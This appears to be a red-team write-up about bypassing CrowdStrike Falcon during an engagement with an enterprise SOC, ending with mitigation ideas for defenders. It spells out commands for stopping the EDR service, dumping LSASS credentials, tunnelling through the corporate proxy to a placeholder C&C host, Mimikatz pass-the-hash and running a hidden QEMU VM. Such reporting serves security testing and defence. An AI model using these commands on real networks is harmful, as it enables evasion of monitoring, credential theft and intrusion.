EDR solutions, and specifically CrowdStrike Falcon, have been giving us a hard time recently. It seemed that no matter how covert we tried to be, a well-trained blue team was able to use these types of solutions to pick up on our activity relatively fast. That’s why, when we had an opportunity to travel to India and sit in the same room as the SOC team of one of the biggest companies in the world - a team that built its detection capabilities around CrowdStrike - we couldn’t resist the urge to test some of our ideas on how these tools can be bypassed.
We ended up with three new techniques for bypassing CrowdStrike that force blue teams (and CrowdStrike) to rethink some of their current detection and mitigation tactics.
What is CrowdStrike anyway?
CrowdStrike looks at the OS of a machine, logs pretty much everything that happens on it (processes, memory, etc.), and alerts on deviations and anomalies from standard behavior (I’m sure it does many more things, but for our purposes this description will suffice). In cases where such anomalies are detected, a SOC analyst can use CrowdStrike to log in to the affected machine, investigate it, collect artifacts and, when needed, stop processes and block the attack. To give a quick example: how often does a legitimate web-server process really start executing OS commands through PowerShell? The answer is not often, and this simple anomaly usually means a web shell (i.e. probably an attack).
This straightforward approach can prove quite effective. In the case of the SOC team we were dealing with, their analysts managed to build up their anomaly mapping to the point where they could detect pretty much any command-line usage that was not absolutely trivial (and we’re talking about an organization with hundreds of thousands of machines to monitor).
For an attacker trying to stay covert, this poses a significant problem. Almost every PowerShell script we execute (no matter how custom and seemingly benign) would trigger an alert, not to mention anything as aggressive as BloodHound, PowerView, and other automated tools.
#1 - Throwing the first punch - shutting down the service
A previously discussed approach to disabling CrowdStrike was to uninstall the product on the compromised machine. In our case, though, the SOC was in the midst of deploying protection against this approach by requiring a special token to uninstall. However, what we found was that, given local SYSTEM permissions, we were able to stop the user-mode service:
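As a rough sketch (rather than the actual screenshot from the engagement), stopping the sensor’s user-mode service from a SYSTEM shell looks something like the following, assuming the default Windows service name CSFalconService (adjust if your deployment names it differently); one way to get the SYSTEM shell is Sysinternals PsExec:

psexec -s cmd.exe
sc stop CSFalconService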
So What Just Happened?
Stopping the user-mode service does not stop CrowdStrike from monitoring and collecting logs (this happens at the kernel level). However, it did lead to a significant achievement: after we shut down this service, the blue team’s analysts were no longer able to use CrowdStrike to take control of the compromised OS. In other words, because CrowdStrike was the blue team’s only means of access, we essentially blocked them from reaching the machine.
Let’s look at a simple scenario to put this in perspective:
Previously, when we took an lsass dump from a server, an alert would be triggered and, within minutes (before we even managed to exfiltrate the dump), the SOC team would connect to the machine via CrowdStrike and grab the same dump we had just taken. So, in addition to detecting the attack, the SOC was also able to learn which credentials were compromised, follow the attacker’s next steps, and reset all the compromised accounts.
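For context, an lsass dump of this kind can be taken with nothing but built-in Windows binaries. The lines below are a hypothetical illustration (not necessarily the exact method we used), assuming administrative rights and an LSASS PID of 624:

tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\lsass.dmp full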
After shutting down the service, however, the blue team was no longer able to connect to the machine or collect the attacker’s artifacts (such as the lsass dump). So while the attack was detected, the ‘thread’ (in terms of which accounts were compromised) was lost.
The SOC team contacted CrowdStrike regarding this technique, and I'm sure it will be solved quickly, so let’s continue to more sophisticated stuff.
#2 Tunnel network to a remote C&C
The power of CrowdStrike relies on its ability to monitor the processes running on the OS.
So what will happen if we run the malicious process on a machine that is not monitored and just tunnel the network to the organization's LAN?
In theory, if we can achieve this, it will be quite hard to track us - all the scripts, binaries and processes (in other words, all the things CrowdStrike looks at) will be executed on the attacker’s machine. The only traces of the attack will be at the organization’s network layer, which is much more difficult to monitor.
Time to put the theory to the test.
Utilizing reverse dynamic port forwarding, a SOCKS5 proxy and OpenSSH for Windows allowed us to build a tunnel that does exactly that - in 5 minutes!
Ok, that’s a lie, it took us ages to configure all of these things to play together (feel free to skip ahead if you want to avoid a headache):
OpenSSH doesn't like Windows.
OpenSSH is the only SSH client we found that natively provides reverse dynamic port forwarding over SOCKS.
OpenSSH really doesn't like Windows.
We had to tunnel outgoing traffic via the organization’s HTTP proxy. OpenSSH doesn’t natively support proxying without NCAT, and the seemingly simple solution using ‘ProxyCommand’ (with NCAT for Windows) failed - we got a ‘/usr/bin’ missing error, on a Windows machine. Debugging was loads of fun.
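For reference, the ProxyCommand attempt followed the standard NCAT pattern, roughly the form below; host names and ports are placeholders, and this is a reconstruction of the failing configuration rather than a verified working one:

ssh.exe -o ProxyCommand="ncat.exe --proxy-type http --proxy PROXY_HOST:PROXY_PORT %h %p" -R 4444 user@C&C_HOST -p C&C_PORT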
Finally, we did manage to build the most overly complicated (probably unnecessarily complicated) tunnel using two NCAT connections piped together. So our complete set-up was:
OpenSSH server for Windows running on the C&C server.
Proxy tunnel set up between the client and the C&C, via 2 NCAT connections:
ncat.exe -lvp 1234 -e "ncat.exe --proxy PROXY_HOST:PROXY_PORT C&C_HOST C&C_PORT"
OpenSSH client for Windows running on the client machine, with Reverse Dynamic Port forward set up through our tunnel:
ssh.exe -R 4444 user@localhost -p 1234
A Windows tool to tunnel all outgoing network from the C&C server through the SOCKS proxy on port 4444 (we used Proxifier).
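Before pointing Proxifier at the new SOCKS listener, it is easy to sanity-check that the reverse dynamic forward is actually serving the internal network - for example with a SOCKS-aware curl request from the C&C (assuming curl is available there; INTERNAL_HOST is a placeholder):

curl --socks5-hostname 127.0.0.1:4444 http://INTERNAL_HOST/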
Ugly as hell, but it worked. Using this tunnel we were able to scan the internal network while running a script on our Amazon AWS machine (we used a very basic PowerShell port scanner as a POC):
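The original script isn’t reproduced here, but a minimal scanner in the same spirit might look like this (the 10.0.0.0/24 range, port list and 200 ms timeout are placeholders, not values from the engagement):

# very basic TCP connect scan - a sketch, not the exact POC script
$ports = 22, 80, 135, 389, 443, 445, 3389
foreach ($i in 1..254) {
    $ip = "10.0.0.$i"
    foreach ($p in $ports) {
        $c = New-Object System.Net.Sockets.TcpClient
        # 200 ms connect timeout per port
        if ($c.BeginConnect($ip, $p, $null, $null).AsyncWaitHandle.WaitOne(200) -and $c.Connected) { "${ip}:${p} open" }
        $c.Close()
    }
}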
So Did it Work?
Short answer - yes! We managed to scan the network and actively exploit it, while staying completely under CrowdStrike’s radar. To complete the POC, we ran Pass-the-Hash using Mimikatz running on our server, attacking the organization’s AD.
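For completeness, the Pass-the-Hash step in Mimikatz follows the usual sekurlsa::pth pattern; the user, domain and hash below are placeholders rather than values from the engagement:

sekurlsa::pth /user:administrator /domain:TARGET_DOMAIN /ntlm:NTLM_HASH /run:powershell.exe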
CrowdStrike saw nothing.
Even when we told the blue team exactly what we had done and how, they were unable to find traces of the attack with CrowdStrike.
We did however encounter two issues:
DNS does not like TCP tunnels, so tools that rely on DNS (for example BloodHound) will not work out of the box.
While we successfully bypassed CrowdStrike, our tunnel did raise an alert in the HTTP proxy, which identified it as tunneling activity. This could perhaps be solved with a better tunnel than our double-NCAT connection, but it is still another issue to deal with.
So, we now had a half-complete bypass solution, but still not everything we wanted. Time for the third and final punch - time to go for the kill.
#3 Running our own VM within the enterprise LAN [KO]
This time, instead of running our scripts on an unmonitored machine outside the LAN using a tunnel, we simply created an unmonitored machine inside the LAN and skipped the tunnel altogether!
It turned out to be easier than expected. Using QEMU we were able to run an emulated VM inside the corporate network without installing anything and without requiring any elevated permissions (see here for how to get this going). As QEMU’s emulation mode does everything in software, we had to go for a GUI-less OS and keep everything very light (running a GUI can be very, very slow without hardware acceleration), so we chose the Tiny Core ‘Core’ distribution as our OS.
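As a rough sketch of what this involves (not our exact command line), a portable qemu-system binary can boot the Core ISO in pure software emulation with user-mode networking; the guest’s outbound connections are then made by the QEMU process itself, so anything reachable from the compromised host is reachable from the VM, with no drivers or admin rights required. The binary and ISO names below assume the portable QEMU for Windows build and the stock Core-current.iso:

qemu-system-x86_64.exe -m 256 -cdrom Core-current.iso -netdev user,id=n0 -device e1000,netdev=n0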
There are no other words for it - it worked beautifully:
Using our newly deployed VM, we were able to run arbitrary scripts and scans against the network (DNS included) and stay completely invisible to CrowdStrike and the blue team. It was truly a moment of joy :-)
Initial thoughts of mitigation (for both blue teams and CrowdStrike)
This research was conducted on a real, live production network of one of the biggest enterprises in the world - I dare say probably one of the bigger CrowdStrike clients out there - and I think it’s safe to say that the techniques outlined in this article would work against most (if not all) CrowdStrike-based defenses.
Some of these issues are easier to solve than others. For example, preventing local users (even those with SYSTEM permissions) from stopping CrowdStrike services can probably be achieved with the correct configuration, and I believe that should be the default CrowdStrike configuration (following the ‘secure by default’ principle).
Network-level monitoring, though evidently necessary, might be trickier, and I’m not sure that CrowdStrike can provide it at the moment. While I believe CrowdStrike Falcon is a good, maybe even excellent, solution, it seems it cannot be the only tool in the detection toolbox; other products are needed for a comprehensive view of the corporate environment.
Final thoughts
The fun part of the whole ‘Red vs. Blue’ concept is the chase - the detection gets better, so the attacker has to come up with new techniques, and vice versa. For a while there, it started to feel like a blue team armed with CrowdStrike had the edge. However, using these new techniques, I regained my faith in the ability of advanced attackers to remain silent. The battle continues!